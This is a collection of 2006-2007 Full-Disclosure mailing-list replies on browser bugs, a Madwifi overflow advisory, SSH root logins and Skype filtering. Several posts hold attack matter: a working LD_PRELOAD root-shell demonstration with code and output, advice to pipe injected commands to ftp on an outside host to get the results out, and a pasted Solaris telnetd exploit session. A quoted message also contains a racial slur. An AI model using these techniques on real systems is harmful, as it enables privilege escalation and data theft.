Re: [Full-disclosure] month of PHP bugs, secondary message?
On 3/4/07, Gadi Evron [EMAIL PROTECTED] wrote: - 3. Are PHP applications also a target of this initiative? No they are not. If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists. snip - http://www.php-security.org/ And he didn't speak about false/insignificant holes disclosure. I gave my solution some months ago. Use mail filters file inclusion, sql injection... - forward spam. Troll detected... (^-^) -- Tyop? Student. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. (^-^) -- GUASCONI Vincent Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox/MSIE focus stealing vulnerability - clarification
On 2/12/07, Ruud H.G. van Tol [EMAIL PROTECTED] wrote: Michal Zalewski wrote: 2) The Firefox attack vector is related to the Charles' CVE-2006-2894, which in turn was a rediscovery of a problem known to Mozilla since 2000 (!); attempts to fix it in official releases failed because the problem was repeatedly marked as a duplicate of a too narrowly defined issue with control hiding. A broader redesign probably eliminated the issue in development branches, but it still affects Firefox 1.5 and 2.0. This can be considered an independent rediscovery and a more practical demonstration of a previously reported vulnerability. The exploit is here: http://lcamtuf.coredump.cx/focusbug/index.html Without JavaScript on, this doesn't work. See http://noscript.net/ Without a browser too, this doesn't work. See http://netcat.sourceforge.net/ -- Guasconi Vincent French Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day was the case that they gave me
On 2/11/07, kcope [EMAIL PROTECTED] wrote: Alla pisteua gia sena, Alla phantasomouna, Nomisa pos magapouses, Kai geliomouna. Alla pisteua gia sena, Alla phantasomouna, Nomisa pos magapouses, Kai geliomouna. http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf http://www.com-winner.com/Alla_pisteua.mp3 http://www.com-winner.com/anothernicesong.mp3 G0 f3tch y0ur Sol10 r00tkitz :) $ uname -a SunOS 5.9 Generic*** sun4u sparc SUNW,Ultra-Enterprise $ ./ex.sh SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ./sunos host account ./sunos localhost bin maya ^-^ ./ex.sh localhost adm SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ALEX ALEX Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.9 login: not working? Password: asd Login incorrect login: Password: Login incorrect login: login: ^C^C^C^C^C^C login: login: login: asd Password: ^C^C^C ^Z $ Ok. Someone have a Sol10? -- GUASCONI Vincent French Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day remote vuln selling SAP / Linux Kernel / PHP etc...
On 2/9/07, v3dt3n [EMAIL PROTECTED] wrote: Dear, please contact me by mail if you want this list. Thx, Rgds, Dear, Please go fcuk yourself. Dear, Please agree the Full Disclosure spirit, here it is : In european too. linxu kernel ipv6 remote code execution vulnerability linux kernel ipv6 local root exploit sap remote exploit what are you searching for ? only linux bug ? interested by only exploit, or vulenrability too ? Im interested only in working exploit, with description. Only in *nix software. No restriction in applications used. Can you give me some prizes, a range, because i need them to convince my boss. more than 5000 e less than 10ke I deeply fu** the security industry. It is honourable to be accused by those who deserve to be accused. Money talks, bullshit walks. (^-^) Thx, rgds. -- GUASCONI Vincent French Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Informix SQL injection
On 2/5/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, I'm doing a pentest on a website that uses informix web datablade and found a sql injection point. I have been able to use the webexplode() stored procedure to execute any SQL commands, and also operating system commands using SYSTEM. The problem I have is that SYSTEM doesnt return the execution result(its a procedure, not a function), so I have to save them to a file; for example : SYSTEM 'ls /etc/ /tmp/result' and then read that file... the problem is... how do i read that file ? I have tried with load from ... and it fails with a sintax error, and on the other side, when I use FILETOCLOB('/tmp/result','server') i dont know how to get the contents of the CLOB... anyone knows something informix ? Cheers, Create a file with a list of commands, and cat \your_file\ | ftp ftp.mydomain.com [port] My 2cts. -- GUASCONI Vincent Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Web 2.0 backdoors made easy with MSIE XMLHttpRequest
On 2/3/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sat, 3 Feb 2007, Michal Zalewski wrote: xmlhttp.open(GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n;, x,true); Funny enough, Paul Szabo was quick to point out that Amit Klein found the same vector that I used here for client-side backdoors in May 2006 (still not patched?! *shrieks in horror*), but for cache poisoning: IE + some popular forward proxy servers = XSS, defacement (browser cache poisoning) http://www.securityfocus.com/archive/1/434931 This is getting depressing. May 2006. but not really surprising, yes? Remember browserfun#18 (Tuesday, July 18, 2006) http://osvdb.org/27110 Metasploit, exploit in the wild like they said. Patched in October. 3 months of real insecurity. (^o^) troll Thx to Determina. http://www.determina.com/security_center/security_advisories/securityadvisory_0day_09282.asp /troll -- Tyop? [Fr] http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
On 2/2/07, Raj Mathur [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 02 February 2007 12:08, [EMAIL PROTECTED] wrote: On Fri, 02 Feb 2007 13:25:11 +0800, Eduardo Tongson said: On 2/2/07, Xavier Beaudouin [EMAIL PROTECTED] wrote: Allowing direct root login even with SSH is IMHO stupid... Please elaborate why is it IYHO stupid. In environments where more than 1 person has root access, allowing direct login to root means you can't keep an audit trail of which person logged in. And if your environment only one person has root access, that's just looking for a DoS if the one person is hit by a bus. I believe we have had this discussion before, but I'll iterate my beliefs in favour of allowing direct root access again: - - Password management is a bitch. I don't remember passwords for about half the accounts I have. Using a key-based root login, I don't need to remember those passwords either. If you take the sudo route, every user has to remember each password for each account, unless you take the deprecated route of reusing passwords (or *horrors* allow sudo without password). key-based login without passphrase is like eating cheese without bred. useless (IMHO). - - With a little bit of configuration, it's easy to figure out which key was used to login to an account; the audit trail can be managed that way. - - Managing which users have access to which root accounts is trivial this way: just add or delete their keys from .ssh/authorized_keys[2]. Totally agree. -- Tyop? http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)
On 2/2/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Fri, Feb 02, 2007 at 04:51:36PM +0100, Tyop? wrote: On 2/2/07, Raj Mathur [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 02 February 2007 12:08, [EMAIL PROTECTED] wrote: On Fri, 02 Feb 2007 13:25:11 +0800, Eduardo Tongson said: On 2/2/07, Xavier Beaudouin [EMAIL PROTECTED] wrote: Allowing direct root login even with SSH is IMHO stupid... Please elaborate why is it IYHO stupid. In environments where more than 1 person has root access, allowing direct login to root means you can't keep an audit trail of which person logged in. And if your environment only one person has root access, that's just looking for a DoS if the one person is hit by a bus. I believe we have had this discussion before, but I'll iterate my beliefs in favour of allowing direct root access again: - - Password management is a bitch. I don't remember passwords for about half the accounts I have. Using a key-based root login, I don't need to remember those passwords either. If you take the sudo route, every user has to remember each password for each account, unless you take the deprecated route of reusing passwords (or *horrors* allow sudo without password). key-based login without passphrase is like eating cheese without bred. useless (IMHO). - - With a little bit of configuration, it's easy to figure out which key was used to login to an account; the audit trail can be managed that way. - - Managing which users have access to which root accounts is trivial this way: just add or delete their keys from .ssh/authorized_keys[2]. Totally agree. ... i eat cheese without bread It's dangerous. -- Tyop? http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
On 1/30/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please stay on topic. Your trolling and bad attempts at humor do not belong on this list. We are all professionals here. Need I cite the list charter? NIGGERS On Mon, 29 Jan 2007 23:29:26 -0500 Simon Smith [EMAIL PROTECTED] wrote: Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote: On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. N3td3v go out of this body ! -- Tyop? http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p -- Tyop? Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Madwifi] Madwifi SIOCGIWSCAN buffer overflow // France Telecom
Name: Madwifi SIOCGIWSCAN buffer overflow Vendor: http://www.madwifi.org Release date: December, 7th 2006 CVE ID: CVE-2006-6332 Authors:Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES 1. Description There is a buffer overflow in the madwifi Atheros driver in some functions called by SIOCSIWSCAN ioctl. This issue is remotely exploitable because ioctl SIOCSIWSCAN may be called automatically by some connexion managers (either directly, by using iwlib or by calling iwlist) when trying to get a list of nearby access points. 2. Details There is a stack buffer overflow in both the giwscan_cb() and encode_ie() functions (ieee80211_wireless.c). The first issue, in giwscan_cb, is related with insufficient checks on the length in some 802.11 information elements which are controlled by the attacker: memcpy(buf, se-se_wpa_ie, se-se_wpa_ie[1] + 2); The second issue is improper boundary checks in encode_ie() where ielen is never checked with bufsize. for (i = 0; i ielen bufsize 2; i++) p += sprintf(p, %02x, ie[i]); A properly crafted 802.11 beacon or probe response frame will trigger the bug when a process tries to get scanning results by calling ioctl SIOCGIWSCAN. The information element used by the attacker can be either WPA IE, RSN IE, WMM IE or ATH IE and will lead to a kernel stack overflow. 3. Vendor status The vendor was notified on December, 6th 2006 and issued version 0.9.2.1 to correct the issue. 4. Authors Laurent BUTTI laurent.butti at francetelecom.com Jerome RAZNIEWSKI jerome.razniewski at francetelecom.com Julien TINNES julien.tinnes at francetelecom.com -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote: Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is updated'. Flashing the bios will erase all data. It's a feature, not a bug. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] *BSD banner INT overflow vulnerability
On 11/26/06, Nick FitzGerald [EMAIL PROTECTED] wrote: [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please maintain a reasonable standard of netiquette when posting. Thanks. Who died and made you list-nanny? Oh, that's right no-fucking-one. Your pathetic posts contribute nothing but noise to the list -- piss off... Thinking that respect of standard is pathetic (netiquette here), will result in all communications, over internet or not, -- noise. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] *BSD banner INT overflow vulnerability
On 11/22/06, Sean Comeau [EMAIL PROTECTED] wrote: On Wed, Nov 22, 2006 at 12:25:46PM +0300, dead code crew wrote: %uname -sir FreeBSD 6.1-RELEASE GENERIC %gdb banner (gdb) r -w 1700 Program received signal SIGSEGV, Segmentation fault. 0x01010101 in ?? () This doesn't crash banner on OpenBSD, and even if it did who cares? What would anyone accomplish by making this setuid root? $ ls -l /usr/bin/banner -r-xr-xr-x 1 root wheel 9576 Jul 5 2005 /usr/bin/banner $ pfiuuu.. I'm safe. Thx a lot. F34r da banner H4x0r. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, In Cognito [EMAIL PROTECTED] wrote: Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe! Fun. Not perfectly safe. My experience : %id uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) %cat vuln.c main() { setuid(0); execl(/usr/bin/id,id,0); } %cc vuln.c -o vuln chmod 4711 ./vuln %exit id uid=1001(tyop) gid=1001(tyop) groups=1001(tyop) ls -l vuln -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln cat tyop.c __attribute__ ((constructor)) main() { printf([+] Hello from shared library land\n); execle(/bin/sh,sh,0,0); } cc -shared -o lib.so tyop.c setenv LD_PRELOAD /home/tyop/test/lib.so ./vuln [+] Hello from shared library land # id uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop) # echo It works on `uname -sr` It works on FreeBSD 7.0-CURRENT-200609 # Have a nice day. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, Tyop? [EMAIL PROTECTED] wrote: On 11/22/06, In Cognito [EMAIL PROTECTED] wrote: Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe! Fun. Not perfectly safe. My experience : %id uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) %cat vuln.c main() { setuid(0); execl(/usr/bin/id,id,0); } %cc vuln.c -o vuln chmod 4711 ./vuln %exit id uid=1001(tyop) gid=1001(tyop) groups=1001(tyop) ls -l vuln -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln cat tyop.c __attribute__ ((constructor)) main() { printf([+] Hello from shared library land\n); execle(/bin/sh,sh,0,0); } cc -shared -o lib.so tyop.c setenv LD_PRELOAD /home/tyop/test/lib.so ./vuln [+] Hello from shared library land # id uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop) # echo It works on `uname -sr` It works on FreeBSD 7.0-CURRENT-200609 # Have a nice day. # echo It works with vuln static too It works with vuln static too. (sry for double post) -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Firefox?
On 11/7/06, Zachary Miller [EMAIL PROTECTED] wrote: On Nov 6, 2006, at 1:34 PM, imipak wrote: Simon Smith wrote: http://www.msfirefox.com/microsoft-firefox/index.html Probably some joker playing mind games.; still -- snip Google search for site:msfirefox.com and look at the cached version. MS Firefox 2007 delivers a dramatic boost in the download speeds of online pornography. By utilising a proprietary dynamic algorithm - anything that remotely resembles a tit or a boob will download up to 10 times faster. Fun at the speed of light! Doubting it's Microsoft, unless they're planning a radical change in company philosophy. Still funny, though. Microsoft Firefox 2007 will run on most Operating Systems (by Microsoft). System Requirements : Computer/Processor Quadcore CPU 4.6GHz processor or higher (For the loading of Hotmail.com) Microsot Powerpoint 2007 (For exceptional Spyware Protection) I *think* it isn't a Microsoft web site... -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 1.5.0.7 Exploit
On 11/2/06, Bram Dumolin [EMAIL PROTECTED] wrote: re, On 2 Nov 2006 16:43:35 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Do 2 Nov 16:35:53 CET 2006 Vulnerable: Firefox 1.5.0.7 and probably versions below Impact: DoS (perhaps Code Execution) As Firefox 2.0 was released a few days ago... A new Exploit for the old version! The great Firefox! ;D On Kubuntu Linux the exploits does not just kill firefox but freezes the whole system! Probably it will also freeze other distros! If the URL is bigger than 4092 bytes, Firefox crashes! The URL in the following code is 4093 bytes! No problem on Mac OS X 10.4.8 with firefox 1.5.0.7. firefox 1.5.0.7 on FreeBSD 7.0(september) and on Linux debian 2.6.17-2-686, Not affected. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Capture Skype trafic ]
On 10/29/06, Brian Eaton [EMAIL PROTECTED] wrote: On 10/28/06, gabriel rosenkoetter [EMAIL PROTECTED] wrote: On Sat, Oct 28, 2006 at 11:24:40AM +0200, Cedric Blancher wrote: Have you ever header of Skype API that basicly allows two application to communicate on top of Skype network, thus inheriting Skype resilience, encryption, obfuscation and firewall punching capapbilities ? I don't see how this isn't still an HR problem. It is an HR problem. It's also an IT problem. Neither group can solve the issue without help from the other. And both groups need buy-in from the rest of the organization if they expect to make the solution stick. Good troll. I think that filtering a program like this, HR or IT, will prevent a lot of problems, because of his closing-encrypted-nonRE source. I find this closed politic-protocol-program too dangerous to let it run in my network. I need to match it on a gate, and I haven't found any usefull informations. Thx to the list for the discussion. -- Tyop? And excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ Capture Skype trafic ]
All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. Thx in advance. -- Tyop? Student. Excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Capture Skype trafic ]
On 10/27/06, Exibar [EMAIL PROTECTED] wrote: From: Tyop? [EMAIL PROTECTED] All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. use a packet analyzer proxy bluecoat comes to mind as one that works quite well... http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf Bluecoat doesn't match the packets, sorry. quote: It is also recommended that enterprises block downloads of URLs ending with skype.exe. This will prevent new Skype software from being downloaded to enterprise machines. This is very funny. ^-^ -- Tyop? Please excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flaw in Firefox 2.0 RC2
On 10/20/06, Jure Pečar [EMAIL PROTECTED] wrote: On Thu, 19 Oct 2006 13:05:48 -0400 Mark A Basil [EMAIL PROTECTED] wrote: On Wed, 2006-10-18 at 10:28 +1000, jm wrote: Firefox 1.5.07 on CentOS died quite nicely too. [EMAIL PROTECTED] wrote: http://lcamtuf.coredump.cx/ffoxdie.html this exploit still works with the latest Firefox 2.0 RC3 It is also affecting any browser using the Gecko rendering engine (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to 'Firefox'. Also renders Opera 9.02 (build 434) on linux unresponsive at 100% cpu usage. Netcat 0.7.1 isn't affected on FreeBSD 7.0. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Rss Feeds
http://portal.spidynamics.com/blogs/msutton/rss.aspx http://ha.ckers.org/blog/feed/ http://sunbeltblog.blogspot.com/ http://www.schneier.com/blog/ http://blogs.technet.com/antimalware/default.aspx http://www.f-secure.com/weblog/ http://taosecurity.blogspot.com/ http://www.avertlabs.com/research/blog http://blogs.technet.com/markrussinovich/default.aspx http://blogs.technet.com/msrc/default.aspx http://technobabylon.typepad.com/tb/ http://isc.sans.org/ http://www.securityfocus.com/ I add one more News/ http://blogs.securiteam.com/index.php/feed/ Last Exploits on the wild/ http://www.metasploit.org/projects/Framework/updates/rss.html http://www.milw0rm.com/rss.php -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day IE6? ActiveX COM
Does someone have more informations about a 0day on ActiveX? Here's my links: http://www.milw0rm.com/exploits/2358 http://blogs.securiteam.com/index.php/archives/600 http://www.xsec.org/ -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/